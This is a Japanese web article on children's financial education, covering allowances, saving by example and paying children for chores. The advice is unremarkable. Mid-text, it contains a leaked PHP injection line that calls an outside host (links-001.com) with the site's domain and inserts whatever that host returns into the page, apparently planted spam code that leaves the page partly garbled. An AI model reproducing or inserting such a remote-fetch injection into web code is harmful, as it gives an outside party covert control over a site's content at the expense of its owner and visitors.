前へ
次へ

マネーに関する教育問題解消は生活面で

小さい頃からお小遣いをもらえることは、当たり前ではありません。
子供の頃にもらっていた経験のある人は多いでしょうが、子供にとってお金をもらえることが当たり前になると、その後の人生でお金を当たり前のように何もしなくてももらえると考え、その後の人生において問題が発生しがちです。
そのため、子供の頃からお金の本当の価値や、正しいお金の使い方、貯蓄の仕方について学ばせておくことが必要となります。
子供が何も知らずに大人になることは、親として教育問題といわざるをえません。
子供の成長のためにお金に対してだけはきちんと学ばせましょう。
4歳ごろから買い物ごっこや、実際に買い物に連れて行き、子供にお金を払わせる練習をさせましょう。
お金で物を変えること、貯めて高い物を買えること、物の価値がわかることを教えておくことで、使えばなくなることを理解することができるでしょう。
貯めるという行為については、なるべく小さな頃から大人が率先して実行しなければ、貯めることに対して習慣づけることはできません。
子供は親の背中を見て育つ物です。
だからこそ、お金を貯める力を身につけさせるためには、なるべく積極的に親が子供の前でお金を貯める姿を見せましょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

小学生に入ったら、お小遣い制度を導入してもいいでしょう。
それまでは特にお小遣い制度を導入する必要はありません。
お小遣い制度を導入するに当たり、労働をしてお小遣いを与えられる形にすることが、最も大切なポイントです。
お小遣いを貯めることや、お小遣いを計画的に使う方法を学ばせるためには、子供のうちから労働させること、お小遣い長をつけて子供にお金の管理を徹底させることが必要となります。
実際に子供のうちからお小遣いを働いて貯める習慣をつけることによって、外で働くことでお金が手に入ることを体感できやすくなるでしょう。
また、お金に対して運用などの方法や、株式会社といった企業がどうやって成り立っているのかを具体的に知ることが必要です。
そのためには、学校でPTAなどからお金に関する勉強ができる人材を呼び、株式会社の仕組みなどについて学ばせることが必要となります。
子供のうちからお金に関する教育問題はなるべく早く解消することで、将来の投資や資産運用への興味も早くから成り立つでしょう。

Page Top